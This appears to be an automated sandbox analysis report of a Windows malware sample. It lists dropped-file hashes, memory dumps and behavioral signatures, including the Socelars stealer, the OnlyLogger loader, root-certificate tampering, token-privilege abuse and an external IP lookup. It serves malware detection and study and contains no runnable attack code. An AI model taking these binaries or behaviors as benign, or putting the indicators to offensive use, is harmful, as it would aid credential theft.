SHA256 1b2d12bf86b519590b7cd63490c6eeace90304ecc3cf3b24262e2dd01b636543
SHA512 8d55c5ec456488775ddcc64f29ad51b5bbe7e1c7f7bbb1cf135e498f0e13e7483bd2599f4631ae1f2e80ee2b3da99f7b6319fe3560e4511d106644e86e337f14

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 72650f186b1c9337c2b259d38504c855
SHA1 442a3e5df28c9ebe1de59637397559a46e199eee
SHA256 798f6a5f548f1f375456534f5d403e9417edadbfdf8ec9b3408631eb51de071e
SHA512 ffb8aa15785d8bf80a8b40aeaa909d7d9e27ddf57363dc399201986d3b7b8657d06012974863fa74bee8ca80e9cbc57994c3112071c54293b4d45d9497acdb6c

memory/4068-239-0x0000000000000000-mapping.dmp

memory/2424-242-0x0000000000000000-mapping.dmp

memory/4068-246-0x00000000002C0000-0x00000000004EE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

MD5 ecbec95fc0b0ca6aee51f5ed6dec2cf0
SHA1 6e1bea66d99a7be247b08cc5af3cb8ec72df62c5
SHA256 ce3a9a9c457dd43c535cabe7cfaffc4ccd5485a02a52a2b13ad0822b6622789b
SHA512 a3256489d95ca5c2ea37aaef84a72346a20c8bcec37558ae920d2c96951af56d0ade2298a84b55a924770e37e54bb0826e67452d4c171697a3b2955c9b835a81

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

MD5 ecbec95fc0b0ca6aee51f5ed6dec2cf0
SHA1 6e1bea66d99a7be247b08cc5af3cb8ec72df62c5
SHA256 ce3a9a9c457dd43c535cabe7cfaffc4ccd5485a02a52a2b13ad0822b6622789b
SHA512 a3256489d95ca5c2ea37aaef84a72346a20c8bcec37558ae920d2c96951af56d0ade2298a84b55a924770e37e54bb0826e67452d4c171697a3b2955c9b835a81

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 72650f186b1c9337c2b259d38504c855
SHA1 442a3e5df28c9ebe1de59637397559a46e199eee
SHA256 798f6a5f548f1f375456534f5d403e9417edadbfdf8ec9b3408631eb51de071e
SHA512 ffb8aa15785d8bf80a8b40aeaa909d7d9e27ddf57363dc399201986d3b7b8657d06012974863fa74bee8ca80e9cbc57994c3112071c54293b4d45d9497acdb6c

memory/4924-251-0x0000000000000000-mapping.dmp

memory/1104-256-0x00007FFD53850000-0x00007FFD54311000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 72650f186b1c9337c2b259d38504c855
SHA1 442a3e5df28c9ebe1de59637397559a46e199eee
SHA256 798f6a5f548f1f375456534f5d403e9417edadbfdf8ec9b3408631eb51de071e
SHA512 ffb8aa15785d8bf80a8b40aeaa909d7d9e27ddf57363dc399201986d3b7b8657d06012974863fa74bee8ca80e9cbc57994c3112071c54293b4d45d9497acdb6c

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

MD5 ecbec95fc0b0ca6aee51f5ed6dec2cf0
SHA1 6e1bea66d99a7be247b08cc5af3cb8ec72df62c5
SHA256 ce3a9a9c457dd43c535cabe7cfaffc4ccd5485a02a52a2b13ad0822b6622789b
SHA512 a3256489d95ca5c2ea37aaef84a72346a20c8bcec37558ae920d2c96951af56d0ade2298a84b55a924770e37e54bb0826e67452d4c171697a3b2955c9b835a81

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

MD5 ecbec95fc0b0ca6aee51f5ed6dec2cf0
SHA1 6e1bea66d99a7be247b08cc5af3cb8ec72df62c5
SHA256 ce3a9a9c457dd43c535cabe7cfaffc4ccd5485a02a52a2b13ad0822b6622789b
SHA512 a3256489d95ca5c2ea37aaef84a72346a20c8bcec37558ae920d2c96951af56d0ade2298a84b55a924770e37e54bb0826e67452d4c171697a3b2955c9b835a81

memory/4440-272-0x00007FFD53850000-0x00007FFD54311000-memory.dmp

memory/4848-274-0x00007FFD53850000-0x00007FFD54311000-memory.dmp

memory/4976-273-0x00007FFD53850000-0x00007FFD54311000-memory.dmp

memory/500-275-0x0000000000000000-mapping.dmp

memory/3028-278-0x0000000000000000-mapping.dmp

memory/3912-284-0x0000000000000000-mapping.dmp

memory/5032-289-0x00007FFD53850000-0x00007FFD54311000-memory.dmp

memory/1184-290-0x0000000000000000-mapping.dmp

memory/4456-291-0x0000000000000000-mapping.dmp

memory/1428-292-0x00007FFD53850000-0x00007FFD54311000-memory.dmp

memory/1624-293-0x00007FFD53850000-0x00007FFD54311000-memory.dmp

memory/1044-295-0x0000000000000000-mapping.dmp

memory/1428-296-0x00007FFD53850000-0x00007FFD54311000-memory.dmp

memory/208-294-0x00007FFD53850000-0x00007FFD54311000-memory.dmp

memory/3800-288-0x0000000000000000-mapping.dmp

memory/2152-287-0x0000000000000000-mapping.dmp

memory/4640-286-0x0000000000000000-mapping.dmp

memory/1428-285-0x0000000000AE0000-0x0000000000AE8000-memory.dmp

memory/208-283-0x0000000000000000-mapping.dmp

memory/1624-282-0x0000000000000000-mapping.dmp

memory/1428-281-0x0000000000000000-mapping.dmp

memory/4084-280-0x0000000000000000-mapping.dmp

memory/3436-279-0x0000000000000000-mapping.dmp

memory/2412-277-0x0000000000000000-mapping.dmp

memory/2304-276-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

MD5 ecbec95fc0b0ca6aee51f5ed6dec2cf0
SHA1 6e1bea66d99a7be247b08cc5af3cb8ec72df62c5
SHA256 ce3a9a9c457dd43c535cabe7cfaffc4ccd5485a02a52a2b13ad0822b6622789b
SHA512 a3256489d95ca5c2ea37aaef84a72346a20c8bcec37558ae920d2c96951af56d0ade2298a84b55a924770e37e54bb0826e67452d4c171697a3b2955c9b835a81

memory/4216-270-0x00007FFD53850000-0x00007FFD54311000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

MD5 ecbec95fc0b0ca6aee51f5ed6dec2cf0
SHA1 6e1bea66d99a7be247b08cc5af3cb8ec72df62c5
SHA256 ce3a9a9c457dd43c535cabe7cfaffc4ccd5485a02a52a2b13ad0822b6622789b
SHA512 a3256489d95ca5c2ea37aaef84a72346a20c8bcec37558ae920d2c96951af56d0ade2298a84b55a924770e37e54bb0826e67452d4c171697a3b2955c9b835a81

C:\Users\Admin\AppData\Local\Temp\Chrome6.exe

MD5 ecbec95fc0b0ca6aee51f5ed6dec2cf0
SHA1 6e1bea66d99a7be247b08cc5af3cb8ec72df62c5
SHA256 ce3a9a9c457dd43c535cabe7cfaffc4ccd5485a02a52a2b13ad0822b6622789b
SHA512 a3256489d95ca5c2ea37aaef84a72346a20c8bcec37558ae920d2c96951af56d0ade2298a84b55a924770e37e54bb0826e67452d4c171697a3b2955c9b835a81

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 72650f186b1c9337c2b259d38504c855
SHA1 442a3e5df28c9ebe1de59637397559a46e199eee
SHA256 798f6a5f548f1f375456534f5d403e9417edadbfdf8ec9b3408631eb51de071e
SHA512 ffb8aa15785d8bf80a8b40aeaa909d7d9e27ddf57363dc399201986d3b7b8657d06012974863fa74bee8ca80e9cbc57994c3112071c54293b4d45d9497acdb6c

memory/732-265-0x00007FFD53850000-0x00007FFD54311000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 72650f186b1c9337c2b259d38504c855
SHA1 442a3e5df28c9ebe1de59637397559a46e199eee
SHA256 798f6a5f548f1f375456534f5d403e9417edadbfdf8ec9b3408631eb51de071e
SHA512 ffb8aa15785d8bf80a8b40aeaa909d7d9e27ddf57363dc399201986d3b7b8657d06012974863fa74bee8ca80e9cbc57994c3112071c54293b4d45d9497acdb6c

memory/3456-263-0x00007FFD53850000-0x00007FFD54311000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 72650f186b1c9337c2b259d38504c855
SHA1 442a3e5df28c9ebe1de59637397559a46e199eee
SHA256 798f6a5f548f1f375456534f5d403e9417edadbfdf8ec9b3408631eb51de071e
SHA512 ffb8aa15785d8bf80a8b40aeaa909d7d9e27ddf57363dc399201986d3b7b8657d06012974863fa74bee8ca80e9cbc57994c3112071c54293b4d45d9497acdb6c

memory/1648-257-0x00007FFD53850000-0x00007FFD54311000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 72650f186b1c9337c2b259d38504c855
SHA1 442a3e5df28c9ebe1de59637397559a46e199eee
SHA256 798f6a5f548f1f375456534f5d403e9417edadbfdf8ec9b3408631eb51de071e
SHA512 ffb8aa15785d8bf80a8b40aeaa909d7d9e27ddf57363dc399201986d3b7b8657d06012974863fa74bee8ca80e9cbc57994c3112071c54293b4d45d9497acdb6c

memory/1032-259-0x0000000000000000-mapping.dmp

memory/1064-258-0x0000000000000000-mapping.dmp

memory/1644-254-0x0000000000000000-mapping.dmp

memory/5028-253-0x00007FFD53850000-0x00007FFD54311000-memory.dmp

memory/4564-252-0x0000000000000000-mapping.dmp

memory/1624-297-0x00007FFD53850000-0x00007FFD54311000-memory.dmp

memory/1044-298-0x0000000002C00000-0x0000000003C00000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 72650f186b1c9337c2b259d38504c855
SHA1 442a3e5df28c9ebe1de59637397559a46e199eee
SHA256 798f6a5f548f1f375456534f5d403e9417edadbfdf8ec9b3408631eb51de071e
SHA512 ffb8aa15785d8bf80a8b40aeaa909d7d9e27ddf57363dc399201986d3b7b8657d06012974863fa74bee8ca80e9cbc57994c3112071c54293b4d45d9497acdb6c

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 72650f186b1c9337c2b259d38504c855
SHA1 442a3e5df28c9ebe1de59637397559a46e199eee
SHA256 798f6a5f548f1f375456534f5d403e9417edadbfdf8ec9b3408631eb51de071e
SHA512 ffb8aa15785d8bf80a8b40aeaa909d7d9e27ddf57363dc399201986d3b7b8657d06012974863fa74bee8ca80e9cbc57994c3112071c54293b4d45d9497acdb6c

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 72650f186b1c9337c2b259d38504c855
SHA1 442a3e5df28c9ebe1de59637397559a46e199eee
SHA256 798f6a5f548f1f375456534f5d403e9417edadbfdf8ec9b3408631eb51de071e
SHA512 ffb8aa15785d8bf80a8b40aeaa909d7d9e27ddf57363dc399201986d3b7b8657d06012974863fa74bee8ca80e9cbc57994c3112071c54293b4d45d9497acdb6c

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 72650f186b1c9337c2b259d38504c855
SHA1 442a3e5df28c9ebe1de59637397559a46e199eee
SHA256 798f6a5f548f1f375456534f5d403e9417edadbfdf8ec9b3408631eb51de071e
SHA512 ffb8aa15785d8bf80a8b40aeaa909d7d9e27ddf57363dc399201986d3b7b8657d06012974863fa74bee8ca80e9cbc57994c3112071c54293b4d45d9497acdb6c

memory/4064-241-0x0000000000000000-mapping.dmp

memory/3064-240-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 72650f186b1c9337c2b259d38504c855
SHA1 442a3e5df28c9ebe1de59637397559a46e199eee
SHA256 798f6a5f548f1f375456534f5d403e9417edadbfdf8ec9b3408631eb51de071e
SHA512 ffb8aa15785d8bf80a8b40aeaa909d7d9e27ddf57363dc399201986d3b7b8657d06012974863fa74bee8ca80e9cbc57994c3112071c54293b4d45d9497acdb6c

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 72650f186b1c9337c2b259d38504c855
SHA1 442a3e5df28c9ebe1de59637397559a46e199eee
SHA256 798f6a5f548f1f375456534f5d403e9417edadbfdf8ec9b3408631eb51de071e
SHA512 ffb8aa15785d8bf80a8b40aeaa909d7d9e27ddf57363dc399201986d3b7b8657d06012974863fa74bee8ca80e9cbc57994c3112071c54293b4d45d9497acdb6c

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 72650f186b1c9337c2b259d38504c855
SHA1 442a3e5df28c9ebe1de59637397559a46e199eee
SHA256 798f6a5f548f1f375456534f5d403e9417edadbfdf8ec9b3408631eb51de071e
SHA512 ffb8aa15785d8bf80a8b40aeaa909d7d9e27ddf57363dc399201986d3b7b8657d06012974863fa74bee8ca80e9cbc57994c3112071c54293b4d45d9497acdb6c

memory/208-299-0x00007FFD53850000-0x00007FFD54311000-memory.dmp

memory/1044-301-0x000000002D9C0000-0x000000002DA79000-memory.dmp

memory/1044-300-0x000000002D810000-0x000000002D8FE000-memory.dmp

memory/4732-302-0x0000015782840000-0x0000015782852000-memory.dmp

memory/4668-303-0x000001802E840000-0x000001802EA61000-memory.dmp

memory/4732-304-0x00007FFD53F40000-0x00007FFD54A01000-memory.dmp

memory/4668-305-0x00007FFD53F40000-0x00007FFD54A01000-memory.dmp

memory/1044-306-0x000000002DA80000-0x000000002DB32000-memory.dmp

memory/3652-311-0x00007FFD53F40000-0x00007FFD54A01000-memory.dmp

memory/964-312-0x0000000000000000-mapping.dmp

memory/3108-310-0x0000000000000000-mapping.dmp

memory/5016-309-0x0000000000000000-mapping.dmp

memory/4212-307-0x00007FFD53F40000-0x00007FFD54A01000-memory.dmp

memory/4328-308-0x0000000000000000-mapping.dmp

memory/4660-318-0x00007FFD53F40000-0x00007FFD54A01000-memory.dmp

memory/3864-322-0x0000000000000000-mapping.dmp

memory/1044-319-0x000000002DB50000-0x000000002DBEE000-memory.dmp

memory/3916-317-0x0000000000000000-mapping.dmp

memory/5032-320-0x0000000000000000-mapping.dmp

memory/1044-316-0x000000002DB50000-0x000000002DBEE000-memory.dmp

memory/3772-315-0x0000000000000000-mapping.dmp

memory/4632-314-0x0000000000000000-mapping.dmp

memory/3704-313-0x0000000000000000-mapping.dmp

memory/3492-323-0x0000000000000000-mapping.dmp

memory/4872-333-0x0000000000000000-mapping.dmp

memory/3708-334-0x0000000000000000-mapping.dmp

memory/4764-336-0x0000000000000000-mapping.dmp

memory/3536-332-0x0000000000000000-mapping.dmp

memory/504-331-0x0000000000000000-mapping.dmp

memory/332-335-0x0000000000000000-mapping.dmp

memory/1188-330-0x0000000000000000-mapping.dmp

memory/1552-326-0x0000000000000000-mapping.dmp

memory/4932-329-0x0000000000000000-mapping.dmp

memory/4352-339-0x00000000029C0000-0x00000000039C0000-memory.dmp

memory/3304-327-0x0000000000000000-mapping.dmp

memory/3368-325-0x0000000000000000-mapping.dmp

memory/4352-390-0x000000002D950000-0x000000002DA02000-memory.dmp

memory/4352-392-0x000000002DA10000-0x000000002DAAE000-memory.dmp

memory/5240-395-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5476-405-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5476-411-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5024-403-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5240-407-0x0000000001310000-0x0000000001330000-memory.dmp

memory/5388-404-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5240-402-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5240-399-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5388-401-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5024-400-0x0000000140000000-0x0000000140786000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2022-07-25 05:16

Reported

2022-07-25 05:19

Platform

win7-20220718-en

Max time kernel

4s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe"

Signatures

OnlyLogger

loader onlylogger

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

Socelars

stealer socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mali.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 34.64.183.91 N/A N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\mali.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\mali.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1420 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe
PID 1420 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe
PID 1420 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe
PID 1420 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe
PID 1420 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\mali.exe
PID 1420 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\mali.exe
PID 1420 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\mali.exe
PID 1420 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\mali.exe
PID 1420 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\inst1.exe
PID 1420 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\inst1.exe
PID 1420 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\inst1.exe
